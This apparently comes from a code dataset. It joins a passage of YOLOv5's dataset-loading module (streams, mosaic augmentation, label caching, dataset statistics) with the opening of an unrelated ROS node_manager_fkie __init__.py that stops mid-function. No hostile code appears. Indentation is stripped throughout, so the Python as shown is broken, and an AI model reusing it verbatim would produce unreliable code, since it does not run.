self.imgs, self.fps, self.frames, self.threads = [None] * n, [0] * n, [0] * n, [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
self.auto = auto
for i, s in enumerate(sources): # index, source
# Start thread to read frames from video stream
print(f'{i + 1}/{n}: {s}... ', end='')
if 'youtube.com/' in s or 'youtu.be/' in s: # if source is YouTube video
check_requirements(('pafy', 'youtube_dl'))
import pafy
s = pafy.new(s).getbest(preftype="mp4").url # YouTube URL
s = eval(s) if s.isnumeric() else s # i.e. s = '0' local webcam
cap = cv2.VideoCapture(s)
assert cap.isOpened(), f'Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
self.fps[i] = max(cap.get(cv2.CAP_PROP_FPS) % 100, 0) or 30.0 # 30 FPS fallback
self.frames[i] = max(int(cap.get(cv2.CAP_PROP_FRAME_COUNT)), 0) or float('inf') # infinite stream fallback
_, self.imgs[i] = cap.read() # guarantee first frame
self.threads[i] = Thread(target=self.update, args=([i, cap]), daemon=True)
print(f" success ({self.frames[i]} frames {w}x{h} at {self.fps[i]:.2f} FPS)")
self.threads[i].start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, self.img_size, stride=self.stride, auto=self.auto)[0].shape for x in self.imgs])
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, i, cap):
# Read stream `i` frames in daemon thread
n, f, read = 0, self.frames[i], 1 # frame number, frame array, inference every 'read' frame
while cap.isOpened() and n < f:
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n % read == 0:
success, im = cap.retrieve()
self.imgs[i] = im if success else self.imgs[i] * 0
time.sleep(1 / self.fps[i]) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if not all(x.is_alive() for x in self.threads) or cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img0 = self.imgs.copy()
img = [letterbox(x, self.img_size, stride=self.stride, auto=self.rect and self.auto)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[..., ::-1].transpose((0, 3, 1, 2)) # BGR to RGB, BHWC to BCHW
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return len(self.sources) # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return [sb.join(x.rsplit(sa, 1)).rsplit('.', 1)[0] + '.txt' for x in img_paths]
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
self.path = path
self.albumentations = Albumentations() if augment else None
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
# f = list(p.rglob('**/*.*')) # pathlib
elif p.is_file(): # file
with open(p, 'r') as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
# f += [p.parent / x.lstrip(os.sep) for x in t] # local to global path (pathlib)
else:
raise Exception(f'{prefix}{p} does not exist')
self.img_files = sorted([x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in IMG_FORMATS])
# self.img_files = sorted([x for x in f if x.suffix[1:].lower() in img_formats]) # pathlib
assert self.img_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {HELP_URL}')
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache')
try:
cache, exists = np.load(cache_path, allow_pickle=True).item(), True # load dict
assert cache['version'] == 0.4 and cache['hash'] == get_hash(self.label_files + self.img_files)
except:
cache, exists = self.cache_labels(cache_path, prefix), False # cache
# Display cache
nf, nm, ne, nc, n = cache.pop('results') # found, missing, empty, corrupted, total
if exists:
d = f"Scanning '{cache_path}' images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
tqdm(None, desc=prefix + d, total=n, initial=n) # display cache results
if cache['msgs']:
logging.info('\n'.join(cache['msgs'])) # display warnings
assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {HELP_URL}'
# Read cache
[cache.pop(k) for k in ('hash', 'version', 'msgs')] # remove items
labels, shapes, self.segments = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
if single_cls:
for x in self.labels:
x[:, 0] = 0
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs, self.img_npy = [None] * n, [None] * n
if cache_images:
if cache_images == 'disk':
self.im_cache_dir = Path(Path(self.img_files[0]).parent.as_posix() + '_npy')
self.img_npy = [self.im_cache_dir / Path(f).with_suffix('.npy').name for f in self.img_files]
self.im_cache_dir.mkdir(parents=True, exist_ok=True)
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(NUM_THREADS).imap(lambda x: load_image(*x), zip(repeat(self), range(n)))
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
if cache_images == 'disk':
if not self.img_npy[i].exists():
np.save(self.img_npy[i].as_posix(), x[0])
gb += self.img_npy[i].stat().st_size
else:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x # im, hw_orig, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB {cache_images})'
pbar.close()
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc, msgs = 0, 0, 0, 0, [] # number missing, found, empty, corrupt, messages
desc = f"{prefix}Scanning '{path.parent / path.stem}' images and labels..."
with Pool(NUM_THREADS) as pool:
pbar = tqdm(pool.imap_unordered(verify_image_label, zip(self.img_files, self.label_files, repeat(prefix))),
desc=desc, total=len(self.img_files))
for im_file, l, shape, segments, nm_f, nf_f, ne_f, nc_f, msg in pbar:
nm += nm_f
nf += nf_f
ne += ne_f
nc += nc_f
if im_file:
x[im_file] = [l, shape, segments]
if msg:
msgs.append(msg)
pbar.desc = f"{desc}{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
pbar.close()
if msgs:
logging.info('\n'.join(msgs))
if nf == 0:
logging.info(f'{prefix}WARNING: No labels found in {path}. See {HELP_URL}')
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = nf, nm, ne, nc, len(self.img_files)
x['msgs'] = msgs # warnings
x['version'] = 0.4 # cache version
try:
np.save(path, x) # save cache for next time
path.with_suffix('.cache.npy').rename(path) # remove .npy suffix
logging.info(f'{prefix}New cache created: {path}')
except Exception as e:
logging.info(f'{prefix}WARNING: Cache directory {path.parent} is not writeable: {e}') # path not writeable
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp augmentation
if random.random() < hyp['mixup']:
img, labels = mixup(img, labels, *load_mosaic(self, random.randint(0, self.n - 1)))
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
labels = self.labels[index].copy()
if labels.size: # normalized xywh to pixel xyxy format
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
nl = len(labels) # number of labels
if nl:
labels[:, 1:5] = xyxy2xywhn(labels[:, 1:5], w=img.shape[1], h=img.shape[0], clip=True, eps=1E-3)
if self.augment:
# Albumentations
img, labels = self.albumentations(img, labels)
nl = len(labels) # update after albumentations
# HSV color-space
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nl:
labels[:, 2] = 1 - labels[:, 2]
# Flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nl:
labels[:, 1] = 1 - labels[:, 1]
# Cutouts
# labels = cutout(img, labels, p=0.5)
labels_out = torch.zeros((nl, 6))
if nl:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0., 0, 0, 1, 0, 0]])
wo = torch.tensor([[0., 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, .5, .5, .5, .5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2., mode='bilinear', align_corners=False)[
0].type(img[i].type())
l = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
img4.append(im)
label4.append(l)
for i, l in enumerate(label4):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, i):
# loads 1 image from dataset index 'i', returns im, original hw, resized hw
im = self.imgs[i]
if im is None: # not cached in ram
npy = self.img_npy[i]
if npy and npy.exists(): # load npy
im = np.load(npy)
else: # read image
path = self.img_files[i]
im = cv2.imread(path) # BGR
assert im is not None, 'Image Not Found ' + path
h0, w0 = im.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # ratio
if r != 1: # if sizes are not equal
im = cv2.resize(im, (int(w0 * r), int(h0 * r)),
interpolation=cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR)
return im, (h0, w0), im.shape[:2] # im, hw_original, hw_resized
else:
return self.imgs[i], self.img_hw0[i], self.img_hw[i] # im, hw_original, hw_resized
def load_mosaic(self, index):
# loads images in a 4-mosaic
labels4, segments4 = [], []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + random.choices(self.indices, k=3) # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
labels4.append(labels)
segments4.extend(segments)
# Concat/clip labels
labels4 = np.concatenate(labels4, 0)
for x in (labels4[:, 1:], *segments4):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4, segments4 = copy_paste(img4, labels4, segments4, p=self.hyp['copy_paste'])
img4, labels4 = random_perspective(img4, labels4, segments4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# loads images in a 9-mosaic
labels9, segments9 = [], []
s = self.img_size
indices = [index] + random.choices(self.indices, k=8) # 8 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img9
if i == 0: # center
img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = [max(x, 0) for x in c] # allocate coords
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
labels9.append(labels)
segments9.extend(segments)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = [int(random.uniform(0, s)) for _ in self.mosaic_border] # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
c = np.array([xc, yc]) # centers
segments9 = [x - c for x in segments9]
for x in (labels9[:, 1:], *segments9):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9 = random_perspective(img9, labels9, segments9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../datasets/coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path='../datasets/coco128'): # from utils.datasets import *; extract_boxes()
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in IMG_FORMATS:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file, 'r') as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../datasets/coco128/images', weights=(0.9, 0.1, 0.0), annotated_only=False):
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
Usage: from utils.datasets import *; autosplit()
Arguments
path: Path to images directory
weights: Train, val, test weights (list, tuple)
annotated_only: Only use images with an annotated txt file
"""
path = Path(path) # images dir
files = sum([list(path.rglob(f"*.{img_ext}")) for img_ext in IMG_FORMATS], []) # image files only
n = len(files) # number of files
random.seed(0) # for reproducibility
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path.parent / x).unlink(missing_ok=True) for x in txt] # remove existing
print(f'Autosplitting images from {path}' + ', using *.txt labeled images only' * annotated_only)
for i, img in tqdm(zip(indices, files), total=n):
if not annotated_only or Path(img2label_paths([str(img)])[0]).exists(): # check label
with open(path.parent / txt[i], 'a') as f:
f.write('./' + img.relative_to(path.parent).as_posix() + '\n') # add image to txt file
def verify_image_label(args):
# Verify one image-label pair
im_file, lb_file, prefix = args
nm, nf, ne, nc, msg, segments = 0, 0, 0, 0, '', [] # number (missing, found, empty, corrupt), message, segments
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
assert im.format.lower() in IMG_FORMATS, f'invalid image format {im.format}'
if im.format.lower() in ('jpg', 'jpeg'):
with open(im_file, 'rb') as f:
f.seek(-2, 2)
if f.read() != b'\xff\xd9': # corrupt JPEG
Image.open(im_file).save(im_file, format='JPEG', subsampling=0, quality=100) # re-save image
msg = f'{prefix}WARNING: corrupt JPEG restored and saved {im_file}'
# verify labels
if os.path.isfile(lb_file):
nf = 1 # label found
with open(lb_file, 'r') as f:
l = [x.split() for x in f.read().strip().splitlines() if len(x)]
if any([len(x) > 8 for x in l]): # is segment
classes = np.array([x[0] for x in l], dtype=np.float32)
segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in l] # (cls, xy1...)
l = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1) # (cls, xywh)
l = np.array(l, dtype=np.float32)
if len(l):
assert l.shape[1] == 5, 'labels require 5 columns each'
assert (l >= 0).all(), 'negative labels'
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels'
assert np.unique(l, axis=0).shape[0] == l.shape[0], 'duplicate labels'
else:
ne = 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
nm = 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
return im_file, l, shape, segments, nm, nf, ne, nc, msg
except Exception as e:
nc = 1
msg = f'{prefix}WARNING: Ignoring corrupted image and/or label {im_file}: {e}'
return [None, None, None, None, nm, nf, ne, nc, msg]
def dataset_stats(path='coco128.yaml', autodownload=False, verbose=False, profile=False, hub=False):
""" Return dataset statistics dictionary with images and instances counts per split per class
To run in parent directory: export PYTHONPATH="$PWD/yolov5"
Usage1: from utils.datasets import *; dataset_stats('coco128.yaml', autodownload=True)
Usage2: from utils.datasets import *; dataset_stats('../datasets/coco128_with_yaml.zip')
Arguments
path: Path to data.yaml or data.zip (with data.yaml inside data.zip)
autodownload: Attempt to download dataset if not found locally
verbose: Print stats dictionary
"""
def round_labels(labels):
# Update labels to integer class and 6 decimal place floats
return [[int(c), *[round(x, 4) for x in points]] for c, *points in labels]
def unzip(path):
# Unzip data.zip TODO: CONSTRAINT: path/to/abc.zip MUST unzip to 'path/to/abc/'
if str(path).endswith('.zip'): # path is data.zip
assert Path(path).is_file(), f'Error unzipping {path}, file not found'
assert os.system(f'unzip -q {path} -d {path.parent}') == 0, f'Error unzipping {path}'
dir = path.with_suffix('') # dataset directory
return True, str(dir), next(dir.rglob('*.yaml')) # zipped, data_dir, yaml_path
else: # path is data.yaml
return False, None, path
def hub_ops(f, max_dim=1920):
# HUB ops for 1 image 'f'
im = Image.open(f)
r = max_dim / max(im.height, im.width) # ratio
if r < 1.0: # image too large
im = im.resize((int(im.width * r), int(im.height * r)))
im.save(im_dir / Path(f).name, quality=75) # save
zipped, data_dir, yaml_path = unzip(Path(path))
with open(check_yaml(yaml_path), errors='ignore') as f:
data = yaml.safe_load(f) # data dict
if zipped:
data['path'] = data_dir # TODO: should this be dir.resolve()?
check_dataset(data, autodownload) # download dataset if missing
hub_dir = Path(data['path'] + ('-hub' if hub else ''))
stats = {'nc': data['nc'], 'names': data['names']} # statistics dictionary
for split in 'train', 'val', 'test':
if data.get(split) is None:
stats[split] = None # i.e. no test set
continue
x = []
dataset = LoadImagesAndLabels(data[split]) # load dataset
for label in tqdm(dataset.labels, total=dataset.n, desc='Statistics'):
x.append(np.bincount(label[:, 0].astype(int), minlength=data['nc']))
x = np.array(x) # shape(128x80)
stats[split] = {'instance_stats': {'total': int(x.sum()), 'per_class': x.sum(0).tolist()},
'image_stats': {'total': dataset.n, 'unlabelled': int(np.all(x == 0, 1).sum()),
'per_class': (x > 0).sum(0).tolist()},
'labels': [{str(Path(k).name): round_labels(v.tolist())} for k, v in
zip(dataset.img_files, dataset.labels)]}
if hub:
im_dir = hub_dir / 'images'
im_dir.mkdir(parents=True, exist_ok=True)
for _ in tqdm(ThreadPool(NUM_THREADS).imap(hub_ops, dataset.img_files), total=dataset.n, desc='HUB Ops'):
pass
# Profile
stats_path = hub_dir / 'stats.json'
if profile:
for _ in range(1):
file = stats_path.with_suffix('.npy')
t1 = time.time()
np.save(file, stats)
t2 = time.time()
x = np.load(file, allow_pickle=True)
print(f'stats.npy times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')
file = stats_path.with_suffix('.json')
t1 = time.time()
with open(file, 'w') as f:
json.dump(stats, f) # save stats *.json
t2 = time.time()
with open(file, 'r') as f:
x = json.load(f) # load hyps dict
print(f'stats.json times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')
# Save, print and return
if hub:
print(f'Saving {stats_path.resolve()}...')
with open(stats_path, 'w') as f:
json.dump(stats, f) # save stats.json
if verbose:
print(json.dumps(stats, indent=2, sort_keys=False))
return stats
|
__init__.py | #!/usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Fraunhofer FKIE/US, Alexander Tiderko
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Fraunhofer nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import argparse
import os
import roslib.network
import rospy
import socket
import sys
import threading
from master_discovery_fkie.common import get_hostname
from node_manager_fkie.common import get_ros_home, masteruri_from_ros
from node_manager_fkie.file_watcher import FileWatcher
from node_manager_fkie.history import History
from node_manager_fkie.master_view_proxy import LaunchArgsSelectionRequest
from node_manager_fkie.name_resolution import NameResolution
from node_manager_fkie.progress_queue import InteractionNeededError
from node_manager_fkie.screen_handler import ScreenHandler, ScreenSelectionRequest, NoScreenOpenLogRequest
from node_manager_fkie.settings import Settings
from node_manager_fkie.ssh_handler import SSHhandler, AuthenticationRequest
from node_manager_fkie.start_handler import StartException, AdvRunCfg
from node_manager_fkie.start_handler import StartHandler, BinarySelectionRequest
PKG_NAME = 'node_manager_fkie'
__author__ = "Alexander Tiderko (Alexander.Tiderko@fkie.fraunhofer.de)"
__copyright__ = "Copyright (c) 2012 Alexander Tiderko, Fraunhofer FKIE/US"
__license__ = "BSD"
__version__ = "0.8.2" # git describe --tags --dirty --always
__date__ = "2018-08-10" # git log -1 --date=iso
# PYTHONVER = (2, 7, 1)
# if sys.version_info < PYTHONVER:
# print 'For full scope of operation this application requires python version > %s, current: %s' % (str(PYTHONVER), sys.version_info)
HOSTS_CACHE = dict()
'''
the cache directory to store the results of tests for local hosts.
@see: L{is_local()}
'''
_LOCK = threading.RLock()
_MAIN_FORM = None
_SETTINGS = None
_SSH_HANDLER = None
_SCREEN_HANDLER = None
_START_HANDLER = None
_NAME_RESOLUTION = None
_HISTORY = None
_FILE_WATCHER = None
_FILE_WATCHER_PARAM = None
_QAPP = None
def settings():
'''
@return: The global settings
@rtype: L{Settings}
'''
return _SETTINGS
def ssh():
'''
@return: The SSH handler to handle the SSH connections
@rtype: L{SSHhandler}
'''
return _SSH_HANDLER
def screen():
'''
@return: The screen handler to the screens.
@rtype: L{ScreenHandler}
@see: U{http://linuxwiki.de/screen}
'''
return _SCREEN_HANDLER
def starter():
'''
@return: The start handler to handle the start of new ROS nodes on local or
remote machines.
@rtype: L{StartHandler}
'''
return _START_HANDLER
def nameres():
'''
@return: The name resolution object translate the the name to the host or
ROS master URI.
@rtype: L{NameResolution}
'''
return _NAME_RESOLUTION
def history():
'''
@return: The history of entered parameter.
@rtype: L{History}
'''
return _HISTORY
def filewatcher():
'''
@return: The file watcher object with all loaded configuration files.
@rtype: L{FileWatcher}
'''
return _FILE_WATCHER
def file_watcher_param():
'''
@return: The file watcher object with all configuration files referenced by
parameter value.
@rtype: L{FileWatcher}
'''
return _FILE_WATCHER_PARAM
def get_ros_hostname(url):
'''
Returns the host name used in a url, if it is a name. If it is an IP an
empty string will be returned.
@return: host or '' if url is an IP or invalid
@rtype: C{str}
'''
return NameResolution.get_ros_hostname(url)
def is_local(hostname, wait=False):
'''
Test whether the given host name is the name of the local host or not.
@param hostname: the name or IP of the host
@type hostname: C{str}
@return: C{True} if the hostname is local or None
@rtype: C{bool}
@raise Exception: on errors while resolving host
'''
if hostname is None:
return True
with _LOCK:
if hostname in HOSTS_CACHE:
if isinstance(HOSTS_CACHE[hostname], threading.Thread):
return False
return HOSTS_CACHE[hostname]
try:
socket.inet_aton(hostname)
